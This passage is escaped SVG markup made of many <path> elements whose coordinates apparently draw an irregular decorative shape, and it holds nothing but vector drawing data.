d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path 